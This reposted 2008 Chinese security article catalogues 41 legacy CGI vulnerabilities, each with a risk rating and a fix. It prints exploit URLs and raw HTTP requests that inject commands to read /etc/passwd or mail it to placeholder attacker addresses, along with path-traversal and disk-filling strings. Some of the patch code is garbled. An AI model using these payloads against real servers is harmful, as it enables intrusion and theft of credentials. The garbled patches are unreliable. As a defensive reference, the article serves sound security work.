天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

网络安全系列知识之CGI漏洞攻击合集上

2008-2-18赛迪网佚名

  以下收集和整理了一些著名的CGI漏洞,并提供了一些安全建议和解决方法,如果服务器存在这些漏洞不及时修补的话,每一个漏洞有可能将会补入侵者利用,加大服务器被攻击的指数。

  1. phf

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许入侵者以root身份执行任何一个指令:

  http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here

  ● 解决方法: 把Apache web server升级到1.1.1以上,或者将NCSA web server升级到最新版本。

  2. wguset.exe

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 如果使用Windows NT做为WebServer的操作系统,而且wguest.exe存在于Web可执行目录中的话,入侵者将能利用它阅读到硬盘上所有USR_用户能阅读的文件。

  ● 解决方法: 将wguset.exe从Web目录中移走或删除。

  3. rguset.exe

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 如果使用Windows NT做为WebServer的操作系统,而且rguest.exe存在于Web可执行目录中的话,入侵者将能利用它阅读到服务器硬盘上所有USR_用户能阅读的文件。

  ● 解决方法: 将rguset.exe从Web目录中移走或删除。

  4. perl.exe

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: 在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。入侵者可以在perl.exe后面加一串指令,利用浏览器在server上执行任何脚本程序。

  ● 解决方法: 在Web目录下移除perl.exe这个程序。

  5. shtml.exe

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: 如果使用Front Page作为WebServer,那么入侵者能够利用IUSR_ 用户和shtml.exe入侵户用的机器。

  ● 解决方法: 将shtml.exe从Web目录移走或删除。

  6. wwwboard.pl

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击。

  ● 建议: 如无必要可以删除该文件。

  ● 解决方法: 将get_variables的子程序中的下面这段:

  if ($FORM{"followup"}) { $followup = "1"
@followup_num = split(/,/,$FORM{"followup"});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{"origdate"}"
$origname = "$FORM{"origname"}"
$origsubject = "$FORM{"origsubject"}" }

  替换为:

  if ($FORM{"followup"}) {
$followup = "1"
@followup_num = split(/,/,$FORM{"followup"});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{"origdate"}"
$origname = "$FORM{"origname"}"
$origsubject = "$FORM{"origsubject"}"
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}

  7. uploader.exe

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 如果使用Windows NT作为WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。

  ● 解决方法: 将uploader.exe从Web目录移走或删除。

  8. bdir.htr

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 如果使用Windows NT做为WebServer的操作系统,而且bdir.htr存在于Web可执行目录中的话,入侵者将能利用它在服务器上无止境的创建ODBC数据库,并生成一些可执行的文件。

  ● 解决方法: 将bdir.htr从Web目录移走或删除。

  9. Count.cgi

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 在/cgi-bin目录下的Count.cgi程序(Wwwcount2.3版本)有一个溢出错误,允许入侵者无须登录而远程执行任何指令。

  ● 建议: 如无必要可以删除该文件。

  ● 解决方法: 将Wwwcount升级到2.4或者以上。

  10. test-cgi

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息。

  ● 建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。

  ● 解决方法: 删除test-cgi文件。

  11. nph-test-cgi

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息。

  ● 建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限。

  ● 解决方法: 删除nph-test-cgi文件。

  12. php.cgi

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者读取的漏洞。

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除php.cgi程序是最好的办法。

  13. handler

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: IRIX 5.3、6.2、6.3、6.4的/cgi-bin/handler程序存在缓存溢出错误,允许入侵者在server上远程执行如下程序:

  telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除handler文件。

  14. webgais

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个漏洞使入侵者可以绕过程序的安全机制,执行系统命令:

  POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80
query="mail+you\@your.host</etc/passwd;echo"&output=subject&domain=paragraph

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除webgais文件。

  15. websendmail

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:

  telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the stri
ng passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a
&subject=a
&content=a

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 高级用户可以编辑websendmail脚本,过滤特殊字符。一般用户则删除websendmail文件。

  16. webdist.cgi

  ● 类型:攻击型

  ● 风险等级:高

  ● 描述:对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令:

  http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi。

  17. faxsurvey

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令:

  http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin/faxsurvey文件。

  18. htmlscript

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个漏洞使入侵者可以查看服务器上的任何文件:

  http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到3.0以上。

  19. pfdisplay

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 在Irix6.4或者更早版本的Web服务器上,/cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件。

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin/pfdisplay文件,或者打补丁程序。

  补丁程序可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下载:

  Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69
Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8
Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F

  20. www-sql

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保护的文件。

  ● 建议: 最好删除www-sql文件。

  ● 解决方法:

  使用如下方法:

  #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform
sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");

  21. ew-source

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 在cgi-bin目录下的view-source程序没有对输入进行安全检查,使入侵者可以查看服务器上的任何文件。

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin目录下的viewsource程序。

  22. campas

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 在cgi-bin目录下的campas程序有一个漏洞可以使入侵者随意查看server上的重要文件:

  telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is "^]".
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin目录下的campas程序。

  23. aglimpse

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 在cgi-bin目录下的aglimpse程序有一个漏洞可以使入侵者无须登录而随意执行任何指令。 

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 。

  ● 解决方法: 删除/cgi-bin目录下的aglimpse程序。

  24. AT-admin.cgi

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允许普通用户完全控制整个系统。

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin目录下的AT-admin.cgi程序。

  25. finger

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 这个位于/cgi-bin下的finger程序,可以查看其他服务器的信息,但是如果将参数改成本机,本机上的账号信息将暴露无遗:

  /cgi-bin/finger?@localhost

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin目录下的finger程序。

  26. webwho.pl

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 如果在Web可执行目录中有webwho.pl这个CGI脚本,那么入侵者将能利用它阅读启动Web的用户能读写执行的任何文件。

  ● 解决方法: 将webwho.pl从Web目录中删除或移走。

  27. w3-msql

  ● 类型:攻击型

  ● 风险等级:低

  ● 描述:MiniSQL软件包发行版本附带的一个CGI(w3-msql)可被用于以httpd的uid权限执行任意代码。这个安全漏洞是由程序中的scanf()函数引起的。

  ● 解决方法:如果安装了MiniSQL软件包,请将/cgi-bin/目录下的w3-msql文件删除或移走.或使用以下补丁程序。

  补丁程序:

  ------ w3-msql.patch ---------
410c410
< scanf("%s ", boundary);
---
> scanf("%128s ", boundary);
418c418
< strcat(var, buffer);
---
> strncat(var, buffer,sizeof(buffer));
428c428
< scanf(" Content-Type: %s ", buffer);
---
> scanf(" Content-Type: %15360s ", buffer);
------ w3-msql.patch ---------

  28. Netscape FastTrack server 2.0.1a

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: UnixWare 7.1附带的Netscape FastTrack server 2.0.1a存在一个远程缓冲区溢出漏洞。默认情况下,该服务监听457端口的http通过http协议提供UnixWare文档。如果向该服务器传送一个长度超过367字符的GET请求,会使缓冲区溢出,EIP值被覆盖将可能导致任意代码以httpd权限执行。

  ● 解决方法: 临时解决方法是关闭Netscape FastTrack服务器。

  29. AnyForm.cgi

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: 位于cgi-bin目录下的AnyForm.cgi程序,是用于简单表单通过邮件传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用在server上执行任何指令。

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 建议升级该cgi程序,或者删除该文件。

  30. whois.cgi

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: 在多个WebServer中带有的Whois.cgi存在溢出漏洞。它们包括:

  Whois Internic Lookup - version: 1.02
CC Whois - Version: 1.0
Matt"s Whois - Version: 1

  它们将使入侵者能够在系统上使用启动httpd用户的权限执行任意的代码。
● 解决方法: 将Web目录中问whois.cgi删除或移走。

  31. environ.cgi

  ● 类型:攻击型

  ● 风险等级:中

  ● 描述:在Apache web server或者IIS等其他web server的/cgi-bin/environ.cgi 程序,有一个漏洞允许入侵者绕过安全机制,浏览服务器上的一些文件。

  ● 建议:建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法:建议升级该cgi程序,或者删除该文件。

  32. wrap

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: /cgi-bin/wrap程序有2个漏洞,均允许入侵者获取服务器上文件的非法访 问,如:

  http://host/cgi-bin/wrap?/../../../../../etc

  ● 建议:建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法:删除/cgi-bin/wrap文件。

  33. edit.pl

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述:/cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用户的配置情况:

  http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

  ● 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

  ● 解决方法: 删除/cgi-bin/edit.pl文件。

  34. service.pwd

  ● 类型:攻击型

  ● 风险等级: 中

  ● 描述: UNix系统的http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息。

  ● 建议: 建议删除service.pwd。

  ● 解决方法:无

  35. administrators.pwd

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。

  ● 建议: 建议删除administrators.pwd。

  ● 解决方法: 无

  36. users.pwd

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。

  ● 建议: 建议删除users.pwd。

  ● 解决方法: 无

  37. authors.pwd

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。

  ● 建议: 建议删除authors.pwd。

  ● 解决方法: 无

  38. visadmin.exe

  ● 类型: 攻击型

  ● 风险等级: 中

  ● 描述: 在OmniHTTPd Web Server的cgi-bin目录下存在这个文件visadmin.exe,那么攻击者只要输入下面的命令:

  http://omni.server/cgi-bin/visadmin.exe?user=guest

  数分钟之后服务器的硬盘将会被撑满。
● 解决方法: 把visadmin.exe从cgi-bin目录中删除。

  39. tst.bat

  ● 类型: 攻击型

  ● 风险等级: 高

  ● 描述: Alibaba的web server,其cgi-bin目录存在tst.bat这个程序,允许入侵者任意执行一条指令:

  http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini

  ● 解决方法: 把tst.bat从cgi-bin目录中删除。

  40. fpcount.exe

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: 如果使用Windows NT作为WebServer的操作平台,并只安装了SP3补丁程序,那么入侵者能利用这个CGI程序进行DoS攻击,使IIS服务拒绝访问。

  ● 解决方法: 将Web目录中的fpcount.exe删除或移走。

  41. openfile.cfm

  ● 类型: 攻击型

  ● 风险等级: 低

  ● 描述: 如果在Web目录中含有:

  /cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm

  这些文件,那么入侵者可能能够利用它们读到系统上的所有文件。

  ● 解决方法: 将Web目录中的openfile.cfm删除或移走。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:赛迪网 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行